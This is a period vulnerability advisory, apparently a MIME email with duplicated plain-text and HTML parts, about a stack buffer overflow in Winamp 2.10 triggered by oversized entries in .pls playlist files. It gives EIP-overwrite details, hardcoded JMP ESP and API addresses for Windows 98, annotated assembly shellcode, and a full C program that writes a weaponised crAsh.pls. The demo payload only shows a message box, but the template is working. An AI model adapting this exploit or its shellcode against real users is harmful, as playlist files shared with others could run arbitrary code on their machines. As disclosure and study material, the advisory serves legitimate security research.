Author: Steve Fewer, darkplan@oceanfree.net http://indigo.ie/~lmf Introduction: I recently uncovered a stack based buffer overflow in winamp version 2.10 which lets me execute 'arbitrary code'. It is=20 carried out through .pls files which winamp uses for playlists.=20 This is unnerving as it is a feasible plan to trade playlists on irc during a mp3 trading session with someone. The overflow occurs when an entry greater than 580 bytes is=20 read in from a .pls file. The EIP is the only register overwritten=20 in the next four bytes that follow, from there on is space for=20 your shell code. eg. [playlist] File1=3D<580 bytes> NumberOfEntries=3D1 =20 The first 580 bytes get mangled around in memory but the 585=20 byte (where our shell code starts) is pointed to by the ESP,=20 therefore a simple 'JMP ESP' or the like will land us back in=20 our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in=20 comctl32.dll which winamp loads. Pointing our EIP into that=20 address lands us back where we want to be.=20 This was all created/tested on Windows 98 [Version 4.10.1998] running on an Intel PII400 with 128MB RAM. The Shell Code: The shell code I wrote for this simply displays a message box=20 and then calls exit(). However Winamp doesn't load msvcrt.dll=20 which is needed to call exit() so we have to load it ourselves.=20 I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for LoadLibraryA(). For calling Messagebox I used the address=20 0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I=20 used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It=20 didn't warrant using GetProcAddress for compatibilities sake. For the OP codes see the exploit further on. // This loads msvcrt.dll push ebp mov ebp,esp xor eax,eax push eax push eax push eax mov byte ptr[ebp-0Ch],4Dh mov byte ptr[ebp-0Bh],53h mov byte ptr[ebp-0Ah],56h mov byte ptr[ebp-09h],43h mov byte ptr[ebp-08h],52h mov byte ptr[ebp-07h],54h mov byte ptr[ebp-06h],2Eh mov byte ptr[ebp-05h],44h mov byte ptr[ebp-04h],4Ch mov byte ptr[ebp-03h],4Ch mov edx,0xBFF776D4 push edx lea eax,[ebp-0Ch] push eax call dword ptr[ebp-10h] // This calls MessageBox to say 'Hi!' push ebp mov ebp,esp xor edi,edi push edi mov byte ptr[ebp-04h],48h mov byte ptr[ebp-03h],69h mov byte ptr[ebp-02h],21h mov edx, 0xBFF5412E push edx push edi lea edx,[ebp-04h] push edx push edx push edi call dword ptr[ebp-08h] // This calls exit() push ebp mov ebp,esp mov edx,0xFFFFFFFF sub edx,0x87FFAAFB push edx xor eax,eax push eax call dword ptr[ebp-04h] The Exploit: <-snip-> /* Stack based buffer overflow exploit for Winamp v2.10 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net * * For a detailed description on the exploit see my advisory. * * Tested with Winamp v2.10 using Windows98 on an Intel * PII 400 with 128MB RAM * * http://indigo.ie/~lmf */ #include int main() { printf("\n\n\t\t.......................................\n"); printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n"); printf("\t\t.......................................\n"); printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n"); printf("\t\t.........http://indigo.ie/~lmf.........\n"); printf("\t\t.......................................\n\n"); char buffer[640]; char eip[8] =3D "\xF7\xCF\xB9\xBF"; char sploit[256] =3D = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53 \xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\= xFA\x2E\xC6 \x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\= x45\xF4\x50 \xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\= x45\xFE\x21 \xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\= xEC\xBA\xFF \xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC"; FILE *file; for(int x=3D0;x<580;x++) { buffer[x] =3D 0x90; } file =3D fopen("crAsh.pls","wb"); fprintf(file, "[playlist]\n"); fprintf(file, "File1=3D"); fprintf(file, "%s", buffer); fprintf(file, "%s", eip); fprintf(file, "%s", sploit); fprintf(file, "\nNumberOfEntries=3D1"); fclose(file); printf("\t created file crAsh.pls loaded with the exploit.\n"); return 0; } <-snip-> -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D ------=_NextPart_000_0029_01BF56CF.4A7BA760 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Nullsoft Winamp 2.10 buffer overflow=20 advisory
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
Author:=20 Steve Fewer, darkplan@oceanfree.net
&nbs= p;            = ;       =20 http://indigo.ie/~lmf
-=3D-=3D-=3D-= =3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D= -=3D-=3D-=3D-=3D-=3D-=3D
 
Introduction:
 
I recently uncovered a stack based = buffer overflow=20 in winamp
version 2.10 which lets me execute 'arbitrary code'. It is=20
carried out through .pls files which winamp uses for playlists. =
This is=20 unnerving as it is a feasible plan to trade playlists on
irc during a = mp3=20 trading session with someone.
 
The overflow occurs when an entry = greater than 580=20 bytes is
read in from a .pls file. The EIP is the only register = overwritten=20
in the next four bytes that follow, from there on is space for =
your=20 shell code. eg.
 
[playlist]
File1=3D<580=20 bytes><eip><shell code>
NumberOfEntries=3D1  =
 
The first 580 bytes get mangled around = in memory=20 but the 585
byte (where our shell code starts) is pointed to by the = ESP,=20
therefore a simple 'JMP ESP' or the like will land us back in =
our shell=20 code. I used a 'JMP ESP' at address 0xBFB9CFF7 in
comctl32.dll which = winamp=20 loads. Pointing our EIP into that
address lands us back where we = want to be.=20
 
This was all created/tested on Windows = 98 [Version=20 4.10.1998]
running on an Intel PII400 with 128MB RAM.
 

The Shell Code:
 
The shell code I wrote for this simply = displays a=20 message box
and then calls exit(). However Winamp doesn't load = msvcrt.dll=20
which is needed to call exit() so we have to load it ourselves. =
I used=20 the address 0xBFF776D4 in kernel32.dll (v4.10.1998) = for
LoadLibraryA(). For=20 calling Messagebox I used the address
0xBFF5412E in user32.dll = (v4.10.1998)=20 and for calling exit() I
used the address 0x78005504 in msvcrt.dll=20 (v6.00.8397.0). It
didn't warrant using GetProcAddress for = compatibilities=20 sake.
For the OP codes see the exploit further on.
 
    // This loads=20 msvcrt.dll
    push ebp
    mov=20 ebp,esp
    xor eax,eax
    push=20 eax
    push eax
    push=20 eax
    mov byte = ptr[ebp-0Ch],4Dh
    mov=20 byte ptr[ebp-0Bh],53h
    mov byte=20 ptr[ebp-0Ah],56h
    mov byte=20 ptr[ebp-09h],43h
    mov byte=20 ptr[ebp-08h],52h
    mov byte=20 ptr[ebp-07h],54h
    mov byte=20 ptr[ebp-06h],2Eh
    mov byte=20 ptr[ebp-05h],44h
    mov byte=20 ptr[ebp-04h],4Ch
    mov byte=20 ptr[ebp-03h],4Ch
    mov = edx,0xBFF776D4
   =20 push edx
    lea eax,[ebp-0Ch]
    = push=20 eax
    call dword ptr[ebp-10h]
    = // This=20 calls MessageBox to say 'Hi!'
    push=20 ebp
    mov ebp,esp
    xor=20 edi,edi
    push edi
    mov byte=20 ptr[ebp-04h],48h
    mov byte=20 ptr[ebp-03h],69h
    mov byte=20 ptr[ebp-02h],21h
    mov edx, = 0xBFF5412E
   =20 push edx
    push edi
    lea=20 edx,[ebp-04h]
    push edx
    push=20 edx
    push edi
    call dword=20 ptr[ebp-08h]
    // This calls = exit()
   =20 push ebp
    mov ebp,esp
    mov=20 edx,0xFFFFFFFF
    sub = edx,0x87FFAAFB
   =20 push edx
    xor eax,eax
    push=20 eax
    call dword ptr[ebp-04h]
 
The Exploit:
 
<-snip->
 
/* Stack based buffer overflow exploit = for Winamp=20 v2.10
 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net
&nbs= p;*
 *=20 For a detailed description on the exploit see my = advisory.
 *
 *=20 Tested with Winamp v2.10 using Windows98 on an Intel
 * PII 400 = with=20 128MB RAM
 *
 * http://indigo.ie/~lmf
 */
 
#include <stdio.h>
 
int main()
{
 
   =20 printf("\n\n\t\t.......................................\n");
 &nb= sp; =20 printf("\t\t......Nullsoft Winamp 2.10 = exploit.....\n");
   =20 printf("\t\t.......................................\n");
  &= nbsp;=20 printf("\t\t.....Author: Steve Fewer, = 04-01-2k.....\n");
   =20 printf("\t\t.........http://indigo.ie/~lmf.........\n");
  &= nbsp;=20 printf("\t\t.......................................\n\n");
 
char buffer[640];
char eip[8] =3D=20 "\xF7\xCF\xB9\xBF";
char sploit[256] =3D=20 "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53
\xC6= \x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\= x2E\xC6
\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\x= bF\x52\x8D\x45\xF4\x50
\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xF= C\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21
\xBA\x2E\x41\xF5\xBF\x52\x57\x8D= \x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF
\xFF\xFF\xFF\x81\= xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
 
FILE *file;
 
    for(int=20 x=3D0;x<580;x++)
    {
    = buffer[x] =3D=20 0x90;
    }
 
file =3D = fopen("crAsh.pls","wb");
 
fprintf(file, = "[playlist]\n");
fprintf(file,=20 "File1=3D");
fprintf(file, "%s", buffer);
fprintf(file, "%s",=20 eip);
fprintf(file, "%s", sploit);
fprintf(file,=20 "\nNumberOfEntries=3D1");
 
fclose(file);
printf("\t    =20 created file crAsh.pls loaded with the exploit.\n");
return=20 0;
}
 
<-snip->
 

-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D= -=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D
------=_NextPart_000_0029_01BF56CF.4A7BA760--